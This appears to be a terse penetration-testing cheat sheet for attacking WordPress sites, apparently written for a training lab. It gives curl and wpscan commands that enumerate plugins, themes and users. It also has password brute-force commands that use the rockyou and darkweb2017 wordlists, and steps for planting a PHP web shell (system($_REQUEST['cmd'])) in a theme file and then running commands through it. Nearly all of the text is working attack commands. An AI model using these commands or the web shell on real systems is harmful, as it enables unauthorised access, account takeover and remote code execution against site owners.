Find installed plugins and themes#
curl -s "http://$target/" | grep -i 'plugins'
curl -s "http://$target/" | grep -i 'themes'Find versions of those plugins#
Unreliable
Example, if you found this plugins
<p><a href="http://wordpress.org/plugins/wp-sitemap-page/">Powered by "WP Sitemap Page"</a></p></div></strong></p>Go to the plugin’s github page, see if there is any changelog, readme, etc
Then grab that file
curl -s "http://$target/wp-content/plugins/wp-sitemap-page/readme.txt"wpscan#
Install
sudo gem install wpscanScan all plugins and themes
wpscan --url "http://$target" -e ap,at -t 500Scan vulnerable plugins and themes
wpscan --url "http://$target" -e vp,vt -t 500Login brute-force
wpscan --url "http://$target" -e u -U ./wpusers -P /usr/share/wordlists/seclists/Passwords/Common-Credentials/darkweb2017_top-100.txt -t 500Login bruteforce#
wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.localRCE?#
if get admin, go to theme or plugins, edit the theme/plugin, choose a php file, add this
system($_REQUEST['cmd']);Then browse to that php file like this:
curl -s "http://$target/wp-content/<themes or plugins>/<theme name>/<php file edited>.php?cmd=id"